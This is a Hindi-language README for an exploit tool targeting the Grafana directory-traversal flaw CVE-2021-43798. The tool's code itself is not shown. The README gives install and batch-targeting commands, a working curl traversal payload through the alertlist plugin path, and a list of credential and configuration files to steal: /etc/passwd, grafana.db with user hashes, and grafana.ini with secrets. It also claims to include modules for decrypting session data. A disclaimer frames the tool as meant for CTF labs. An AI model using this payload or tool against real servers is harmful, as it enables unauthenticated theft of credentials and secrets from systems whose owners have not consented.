
📂 Grafana LFI Exploit (CVE-2021-43798). क्रेडेंशियल और कॉन्फ़िगरेशन की स्वचालित निकासी। 🕵️
🚀 Grafana LFI Exploit (CVE-2021-43798)
Grafana (8.0.0 से 8.3.0 संस्करणों) में Local File Inclusion (LFI) भेद्यता का शोषण करने के लिए Python 3 स्वचालन स्क्रिप्ट। यह एक्सप्लॉइट बिना प्रमाणीकरण के ऑपरेटिंग सिस्टम की संवेदनशील फ़ाइलों को पढ़ने के लिए directory traversal करने की अनुमति देता है। ✨ विशेषताएँ
Python 3.10+ संगतता: आधुनिक Python संस्करणों के साथ काम करने के लिए पैच किया गया (collections.Mapping का सुधार)।
बैच स्कैनिंग: targets.txt फ़ाइल के माध्यम से कई लक्ष्यों को संसाधित करने की क्षमता।
डेटा डिक्रिप्शन: Grafana के सत्रों और एन्क्रिप्टेड डेटा को संभालने के लिए मॉड्यूल शामिल हैं।
CTF के लिए अनुकूलित: स्वच्छ और सीधा आउटपुट, HackTheBox और TryHackMe जैसे लैब्स के लिए आदर्श।
🛠️ आवश्यकताएँ और इंस्टॉलेशन
पुरानी लाइब्रेरी निर्भरताओं के कारण, निम्नलिखित पैकेज स्थापित करने की अनुशंसा की जाती है: Bash
pip3 install PyInquirer termcolor requests pycryptodome --break-system-packages
नोट: यदि आप Python 3.10 या उससे ऊपर का उपयोग करते हैं, तो स्क्रिप्ट collections.abc के साथ संगतता के लिए एक स्वचालित पैच शामिल करती है।
🚀 उपयोग
लक्ष्य कॉन्फ़िगर करें: targets.txt फ़ाइल में URLs (पोर्ट के साथ) जोड़ें।
Bash
echo "http://10.129.234.47:3000" > targets.txt
एक्सप्लॉइट चलाएँ:
Bash
python3 exploit.py
🎯 सामान्य पठन लक्ष्य (LFI)
एक बार चलाने के बाद, आप निम्न जैसी महत्वपूर्ण फ़ाइलें पढ़ने का प्रयास कर सकते हैं:
/etc/passwd (सिस्टम उपयोगकर्ता)
/var/lib/grafana/grafana.db (उपयोगकर्ताओं के हैश वाला डेटाबेस)
/etc/grafana/grafana.ini (कॉन्फ़िगरेशन और रहस्य)
💡 वैकल्पिक तरीका (मैनुअल)
यदि आप स्क्रिप्ट का उपयोग नहीं करना चाहते हैं, तो आप curl के माध्यम से सीधे LFI का शोषण कर सकते हैं: Bash
curl --path-as-is "http://<TARGET_IP>:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"
⚠️ अस्वीकरण
यह रिपॉजिटरी विशेष रूप से शैक्षिक उद्देश्यों और नियंत्रित वातावरण (CTFs, लैब्स) में उपयोग के लिए बनाई गई है। लेखक इस उपकरण के दुरुपयोग के लिए ज़िम्मेदार नहीं है। 🏷️ टॉपिक्स (लेबल)
grafana, cve-2021-43798, lfi, exploit, pentesting, hackthebox, python3, directory-traversal